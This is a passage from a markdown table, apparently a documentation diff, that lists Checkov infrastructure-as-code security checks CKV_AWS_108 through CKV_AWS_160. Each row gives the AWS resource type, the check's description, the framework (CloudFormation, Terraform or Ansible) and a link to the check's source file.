[IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 420 | CKV_AWS_108 | resource | AWS::IAM::User | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 421 | CKV_AWS_108 | data | aws_iam_policy_document | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMDataExfiltration.py) | -| 422 | CKV_AWS_109 | resource | AWS::IAM::Group | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 423 | CKV_AWS_109 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 424 | CKV_AWS_109 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 425 | CKV_AWS_109 | resource | AWS::IAM::Role | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 426 | CKV_AWS_109 | resource | AWS::IAM::User | Ensure IAM policies does not allow permissions management 
without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 427 | CKV_AWS_109 | data | aws_iam_policy_document | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py) | -| 428 | CKV_AWS_110 | resource | AWS::IAM::Group | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 429 | CKV_AWS_110 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 430 | CKV_AWS_110 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 431 | CKV_AWS_110 | resource | AWS::IAM::Role | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 432 | CKV_AWS_110 | resource | AWS::IAM::User | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 433 | CKV_AWS_110 | data | aws_iam_policy_document | Ensure IAM policies does not allow privilege 
escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPrivilegeEscalation.py) |
-| 434 | CKV_AWS_111 | resource | AWS::IAM::Group | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
-| 435 | CKV_AWS_111 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
-| 436 | CKV_AWS_111 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
-| 437 | CKV_AWS_111 | resource | AWS::IAM::Role | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
-| 438 | CKV_AWS_111 | resource | AWS::IAM::User | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
-| 439 | CKV_AWS_111 | data | aws_iam_policy_document | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMWriteAccess.py) |
-| 440 | CKV_AWS_112 | resource | aws_ssm_document | Ensure Session Manager data is encrypted in transit | Terraform | 
[SSMSessionManagerDocumentEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py) |
-| 441 | CKV_AWS_113 | resource | aws_ssm_document | Ensure Session Manager logs are enabled and encrypted | Terraform | [SSMSessionManagerDocumentLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py) |
-| 442 | CKV_AWS_114 | resource | aws_emr_cluster | Ensure that EMR clusters with Kerberos have Kerberos Realm set | Terraform | [EMRClusterKerberosAttributes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py) |
-| 443 | CKV_AWS_115 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) |
-| 444 | CKV_AWS_115 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) |
-| 445 | CKV_AWS_115 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Terraform | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) |
-| 446 | CKV_AWS_116 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | 
[LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) |
-| 447 | CKV_AWS_116 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) |
-| 448 | CKV_AWS_116 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Terraform | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py) |
-| 449 | CKV_AWS_117 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) |
-| 450 | CKV_AWS_117 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) |
-| 451 | CKV_AWS_117 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured inside a VPC | Terraform | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaInVPC.py) |
-| 452 | CKV_AWS_118 | resource | AWS::RDS::DBInstance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Cloudformation | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py) |
-| 453 | CKV_AWS_118 | resource | aws_db_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | 
[RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) |
-| 454 | CKV_AWS_118 | resource | aws_rds_cluster_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) |
-| 455 | CKV_AWS_119 | resource | AWS::DynamoDB::Table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Cloudformation | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamoDBTablesEncrypted.py) |
-| 456 | CKV_AWS_119 | resource | aws_dynamodb_table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Terraform | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py) |
-| 457 | CKV_AWS_120 | resource | AWS::ApiGateway::Stage | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) |
-| 458 | CKV_AWS_120 | resource | AWS::Serverless::Api | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) |
-| 459 | CKV_AWS_120 | resource | aws_api_gateway_stage | Ensure API Gateway caching is enabled | Terraform | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py) |
-| 460 | CKV_AWS_121 | resource | aws_config_configuration_aggregator | Ensure AWS Config is enabled in all regions | Terraform | 
[ConfigConfgurationAggregatorAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py) |
-| 461 | CKV_AWS_122 | resource | aws_sagemaker_notebook_instance | Ensure that direct internet access is disabled for an Amazon SageMaker Notebook Instance | Terraform | [SageMakerInternetAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py) |
-| 462 | CKV_AWS_123 | resource | AWS::EC2::VPCEndpointService | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Cloudformation | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) |
-| 463 | CKV_AWS_123 | resource | aws_vpc_endpoint_service | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Terraform | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) |
-| 464 | CKV_AWS_124 | resource | aws_cloudformation_stack | Ensure that CloudFormation stacks are sending event notifications to an SNS topic | Terraform | [CloudformationStackNotificationArns.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py) |
-| 465 | CKV_AWS_126 | resource | aws_instance | Ensure that detailed monitoring is enabled for EC2 instances | Terraform | [EC2DetailedMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py) |
-| 466 | CKV_AWS_127 | resource | aws_elb | Ensure that Elastic Load Balancer(s) uses SSL certificates provided by AWS Certificate Manager | Terraform | 
[ELBUsesSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBUsesSSL.py) |
-| 467 | CKV_AWS_129 | resource | aws_db_instance | Ensure that respective logs of Amazon Relational Database Service (Amazon RDS) are enabled | Terraform | [DBInstanceLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceLogging.py) |
-| 468 | CKV_AWS_130 | resource | aws_subnet | Ensure VPC subnets do not assign public IP by default | Terraform | [SubnetPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SubnetPublicIP.py) |
-| 469 | CKV_AWS_131 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure that ALB drops HTTP headers | Cloudformation | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBDropHttpHeaders.py) |
-| 470 | CKV_AWS_131 | resource | aws_alb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) |
-| 471 | CKV_AWS_131 | resource | aws_lb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) |
-| 472 | CKV_AWS_133 | resource | aws_db_instance | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) |
-| 473 | CKV_AWS_133 | resource | aws_rds_cluster | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) |
-| 474 | CKV_AWS_134 | resource | aws_elasticache_cluster | 
Ensure that Amazon ElastiCache Redis clusters have automatic backup turned on | Terraform | [ElasticCacheAutomaticBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py) |
-| 475 | CKV_AWS_135 | resource | [?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
-| 476 | CKV_AWS_135 | resource | [?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
-| 477 | CKV_AWS_135 | resource | [].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
-| 478 | CKV_AWS_135 | resource | [].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
-| 479 | CKV_AWS_135 | resource | [].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
-| 480 | CKV_AWS_135 | resource | [].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
-| 481 | CKV_AWS_135 | resource | [].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) 
|
-| 482 | CKV_AWS_135 | resource | [].block[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
-| 483 | CKV_AWS_135 | resource | [].tasks[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
-| 484 | CKV_AWS_135 | resource | [].tasks[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
-| 485 | CKV_AWS_135 | resource | [].tasks[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
-| 486 | CKV_AWS_135 | resource | [].tasks[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
-| 487 | CKV_AWS_135 | resource | [].tasks[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
-| 488 | CKV_AWS_135 | resource | [].tasks[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
-| 489 | CKV_AWS_135 | resource | [].tasks[].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | 
[EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
-| 490 | CKV_AWS_135 | resource | [].tasks[].block[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
-| 491 | CKV_AWS_135 | resource | aws_instance | Ensure that EC2 is EBS optimized | Terraform | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py) |
-| 492 | CKV_AWS_136 | resource | AWS::ECR::Repository | Ensure that ECR repositories are encrypted using KMS | Cloudformation | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRRepositoryEncrypted.py) |
-| 493 | CKV_AWS_136 | resource | aws_ecr_repository | Ensure that ECR repositories are encrypted using KMS | Terraform | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py) |
-| 494 | CKV_AWS_137 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) |
-| 495 | CKV_AWS_137 | resource | aws_opensearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) |
-| 496 | CKV_AWS_138 | resource | aws_elb | Ensure that ELB is cross-zone-load-balancing enabled | Terraform | [ELBCrossZoneEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py) |
-| 497 | CKV_AWS_139 | resource | aws_rds_cluster | Ensure 
that RDS clusters have deletion protection enabled | Terraform | [RDSDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py) |
-| 498 | CKV_AWS_140 | resource | aws_rds_global_cluster | Ensure that RDS global clusters are encrypted | Terraform | [RDSClusterEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py) |
-| 499 | CKV_AWS_141 | resource | aws_redshift_cluster | Ensured that Redshift cluster allowing version upgrade by default | Terraform | [RedshiftClusterAllowVersionUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py) |
-| 500 | CKV_AWS_142 | resource | aws_redshift_cluster | Ensure that Redshift cluster is encrypted by KMS | Terraform | [RedshiftClusterKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py) |
-| 501 | CKV_AWS_143 | resource | aws_s3_bucket | Ensure that S3 bucket has lock configuration enabled by default | Terraform | [S3BucketObjectLock.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py) |
-| 502 | CKV_AWS_144 | resource | aws_s3_bucket | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) |
-| 503 | CKV_AWS_144 | resource | aws_s3_bucket_replication_configuration | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) |
-| 504 | CKV_AWS_145 | resource | aws_s3_bucket | Ensure that S3 buckets are 
encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) |
-| 505 | CKV_AWS_145 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) |
-| 506 | CKV_AWS_146 | resource | aws_db_cluster_snapshot | Ensure that RDS database cluster snapshot is encrypted | Terraform | [RDSClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py) |
-| 507 | CKV_AWS_147 | resource | aws_codebuild_project | Ensure that CodeBuild projects are encrypted using CMK | Terraform | [CodebuildUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildUsesCMK.py) |
-| 508 | CKV_AWS_148 | resource | aws_default_vpc | Ensure no default VPC is planned to be provisioned | Terraform | [VPCDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py) |
-| 509 | CKV_AWS_149 | resource | AWS::SecretsManager::Secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Cloudformation | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecretManagerSecretEncrypted.py) |
-| 510 | CKV_AWS_149 | resource | aws_secretsmanager_secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Terraform | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py) |
-| 511 | CKV_AWS_150 | resource | aws_alb | Ensure that Load Balancer has deletion 
protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) |
-| 512 | CKV_AWS_150 | resource | aws_lb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) |
-| 513 | CKV_AWS_152 | resource | aws_alb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) |
-| 514 | CKV_AWS_152 | resource | aws_lb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) |
-| 515 | CKV_AWS_153 | resource | aws_autoscaling_group | Autoscaling groups should supply tags to launch configurations | Terraform | [AutoScalingTagging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingTagging.py) |
-| 516 | CKV_AWS_154 | resource | AWS::Redshift::Cluster | Ensure Redshift is not deployed outside of a VPC | Cloudformation | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftInEc2ClassicMode.py) |
-| 517 | CKV_AWS_154 | resource | aws_redshift_cluster | Ensure Redshift is not deployed outside of a VPC | Terraform | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py) |
-| 518 | CKV_AWS_155 | resource | AWS::WorkSpaces::Workspace | Ensure that Workspace user volumes are encrypted | Cloudformation | 
[WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) |
-| 519 | CKV_AWS_155 | resource | aws_workspaces_workspace | Ensure that Workspace user volumes are encrypted | Terraform | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) |
-| 520 | CKV_AWS_156 | resource | AWS::WorkSpaces::Workspace | Ensure that Workspace root volumes are encrypted | Cloudformation | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) |
-| 521 | CKV_AWS_156 | resource | aws_workspaces_workspace | Ensure that Workspace root volumes are encrypted | Terraform | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) |
-| 522 | CKV_AWS_157 | resource | AWS::RDS::DBInstance | Ensure that RDS instances have Multi-AZ enabled | Cloudformation | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSMultiAZEnabled.py) |
-| 523 | CKV_AWS_157 | resource | aws_db_instance | Ensure that RDS instances have Multi-AZ enabled | Terraform | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py) |
-| 524 | CKV_AWS_158 | resource | AWS::Logs::LogGroup | Ensure that CloudWatch Log Group is encrypted by KMS | Cloudformation | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupKMSKey.py) |
-| 525 | CKV_AWS_158 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group is encrypted by KMS | Terraform | 
[CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py) |
-| 526 | CKV_AWS_159 | resource | aws_athena_workgroup | Ensure that Athena Workgroup is encrypted | Terraform | [AthenaWorkgroupEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py) |
-| 527 | CKV_AWS_160 | resource | AWS::Timestream::Database | Ensure that Timestream database is encrypted with KMS CMK | Cloudformation | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py) |
-| 528 | CKV_AWS_160 | resource | aws_timestreamwrite_database | Ensure that Timestream database is encrypted with KMS CMK | Terraform | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TimestreamDatabaseKMSKey.py) |
